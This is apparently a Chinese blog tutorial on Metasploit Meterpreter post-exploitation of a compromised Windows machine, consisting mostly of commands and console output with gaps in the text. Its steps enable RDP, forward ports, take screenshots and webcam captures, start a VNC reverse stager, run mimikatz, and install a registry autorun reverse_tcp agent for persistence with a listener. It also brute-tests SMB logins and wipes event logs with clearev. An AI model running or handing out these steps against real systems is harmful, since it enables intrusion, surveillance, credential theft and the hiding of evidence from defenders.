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    meterpreter > run getgui -e
    [!] Meterpreter scripts are deprecated. Try post/windows/manage/enable_rdp.
    [!] Example: run post/windows/manage/enable_rdp OPTION=value [...]
    [*] Windows Remote Desktop Configuration Meterpreter Script by Darkoperator
    [*] Carlos Perez carlos_perez@darkoperator.com
    [*] Enabling Remote Desktop
    [*] 	RDP is already enabled
    [*] Setting Terminal Services service startup mode
    [*] 	Terminal Services service is already set to auto
    [*] 	Opening port in local firewall if necessary
    [*] For cleanup use command: run multi_console_command -r /root/.msf4/logs/scripts/getgui/clean_up__20191012.5056.rc
    meterpreter > 
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    1. 登录前检查


    meterpreter > idletime
    User has been idle for: 3 hours 48 mins 26 secs
    meterpreter > 
    • 1
    • 2
    • 3
    • 4
    1. 使用rdesktop连接目标桌面
    root@kali:~# rdesktop
    Autoselected keyboard map en-us
    Failed to negotiate protocol, retrying with plain RDP.
    WARNING: Remote desktop does not support colour depth 24; falling back to 16
    • 1
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    • 6

    此时弹出GUI界面,输入用户名/密码进行登录 。






    meterpreter > portfwd add -l 9833 -r -p 3389
    [*] Local TCP relay created: :9833 <->
    meterpreter > 
    • 1
    • 2
    • 3
    • 4


    root@kali:~# rdesktop
    Autoselected keyboard map en-us
    Failed to negotiate protocol, retrying with plain RDP.
    WARNING: Remote desktop does not support colour depth 24; falling back to 16
    • 1
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    meterpreter > screenshot
    Screenshot saved to: /root/aAKvRlgG.jpeg
    meterpreter > 
    • 1
    • 2
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    • 4


    • 获取摄像头列表

      • 1
    • 从指定的摄像头拍摄照片

      • 1
    • 从指定的摄像头实时视频流

      • 1


    meterpreter > getuid
    Server username: NT AUTHORITY\SYSTEM
    meterpreter > run vnc
    [*] Creating a VNC reverse tcp stager: LHOST= LPORT=4545
    [*] Running payload handler
    [*] VNC stager executable 73802 bytes long
    [*] Uploaded the VNC agent to C:\Windows\TEMP\QwdqufeOMpX.exe (must be deleted manually)
    [*] Executing the VNC agent with endpoint
    meterpreter > /usr/bin/vncviewer: VNC server closed connection
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    meterpreter > run vnc
    [*] Creating a VNC reverse tcp stager: LHOST= LPORT=4545
    [*] Running payload handler
    [*] VNC stager executable 73802 bytes long
    [*] Uploaded the VNC agent to C:\Windows\TEMP\plKeHIXhzUQQ.exe (must be deleted manually)
    [*] Executing the VNC agent with endpoint
    Connected to RFB server, using protocol version 3.8
    Enabling TightVNC protocol extensions
    meterpreter > No authentication needed
    Authentication successful
    Desktop name "pc"
    VNC server default format:
      32 bits per pixel.
      Least significant byte first in each pixel.
      True colour: max red 255 green 255 blue 255, shift red 16 green 8 blue 0
    Using default colormap which is TrueColor.  Pixel format:
      32 bits per pixel.
      Least significant byte first in each pixel.
      True colour: max red 255 green 255 blue 255, shift red 16 green 8 blue 0
    Same machine: preferring raw encoding
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    • 上传文件
    meterpreter > upload /root/flag.txt
    [*] uploading  : /root/flag.txt -> flag.txt
    [*] Uploaded 9.00 B of 9.00 B (100.0%): /root/flag.txt -> flag.txt
    [*] uploaded   : /root/flag.txt -> flag.txt
    meterpreter > 
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    • 运行文件
    meterpreter > execute -i -f cmd.exe
    Process 1020 created.
    Channel 40 created.
    Microsoft Windows [�汾 6.1.7601]
    ��Ȩ���� (c) 2009 Microsoft Corporation����������Ȩ����
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    比如上传mimikatz程序,然后执行execute -i -f mimikatz.exe ,进入mimikatz的交互界面。




    -f 指定可执行文件

    -i 跟进程进行交互

    -H 创建一个隐藏进程

    -a 传递给命令的参数

    -m 从内存中执行

    -s 在给定会话中执行进程

    -t 使用当前伪造的线程令牌运行进行

    • 下载文件
    meterpreter > download "c:\Windows\System32\drivers\etc\hosts"
    [*] Downloading: c:\Windows\System32\drivers\etc\hosts -> hosts
    [*] Downloaded 824.00 B of 824.00 B (100.0%): c:\Windows\System32\drivers\etc\hosts -> hosts
    [*] download   : c:\Windows\System32\drivers\etc\hosts -> hosts
    meterpreter > 
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    • 启动项


      C:\Users\$username$\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup
      • 1


    • 系统服务

    meterpreter > run persistence -X -i 5 -p 8888 -r
    [!] Meterpreter scripts are deprecated. Try post/windows/manage/persistence_exe.
    [!] Example: run post/windows/manage/persistence_exe OPTION=value [...]
    [*] Running Persistence Script
    [*] Resource file for cleanup created at /root/.msf4/logs/persistence/PC_20191013.2138/PC_20191013.2138.rc
    [*] Creating Payload=windows/meterpreter/reverse_tcp LHOST= LPORT=8888
    [*] Persistent agent script is 99669 bytes long
    [+] Persistent Script written to C:\Windows\TEMP\OueYyJlRdu.vbs
    [*] Executing script C:\Windows\TEMP\OueYyJlRdu.vbs
    [+] Agent executed with PID 3776
    [*] Installing into autorun as HKLM\Software\Microsoft\Windows\CurrentVersion\Run\UIfUmCsT
    [+] Installed into autorun as HKLM\Software\Microsoft\Windows\CurrentVersion\Run\UIfUmCsT
    meterpreter > 
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    -X 开机启动,-i 反向连接间隔, -r 连接的主机,-p 连接的端口


    root@kali:~# nc -lvnp 8888
    listening on [any] 8888 ...
    connect to [] from (UNKNOWN) [] 49195
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    msf5 exploit(windows/smb/ms17_010_eternalblue) > use exploit/multi/handler 
    msf5 exploit(multi/handler) > set lport 8888
    lport => 8888
    msf5 exploit(multi/handler) > run
    [*] Started reverse TCP handler on 
    [*] Sending stage (179779 bytes) to
    [*] Meterpreter session 2 opened ( -> at 2019-10-13 01:05:56 -0400
    meterpreter > getuid
    Server username: PC\xman666
    meterpreter > 
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    meterpreter > run get_local_subnets
    [!] Meterpreter scripts are deprecated. Try post/multi/manage/autoroute.
    [!] Example: run post/multi/manage/autoroute OPTION=value [...]
    Local subnet:
    meterpreter > 
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    use  auxiliary/scanner/rdp/rdp_scanner 
    set  rhosts
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    use     auxiliary/scanner/smb/smb_login
    set     RHOSTS
    set     SMBUser   administrator
    set     SMBPass   123456a?
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    有时候,不能直接远程桌面登录另外一台Window机器,这个时候可以使用Enter-PSSession命令,通过PowerShell终端登到远程的Window机器,这个时候,就需要被访问的机器打开5985 或者5986 端口。 默认情况下,Window 2008 Server或者Window 2012 Server会自动默认开启WinRM的服务器,从而暴露5985或者5986端口。

    Enter-PSSession -computerName Server-R2
    • 1


    meterpreter > clearev
    [*] Wiping 8202 records from Application...
    [*] Wiping 23907 records from System...
    [*] Wiping 8154 records from Security...
    meterpreter > 
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  • 相关阅读:
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    今年的 618 不行了?
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  • 原文地址:https://blog.csdn.net/qq_32277727/article/details/138199345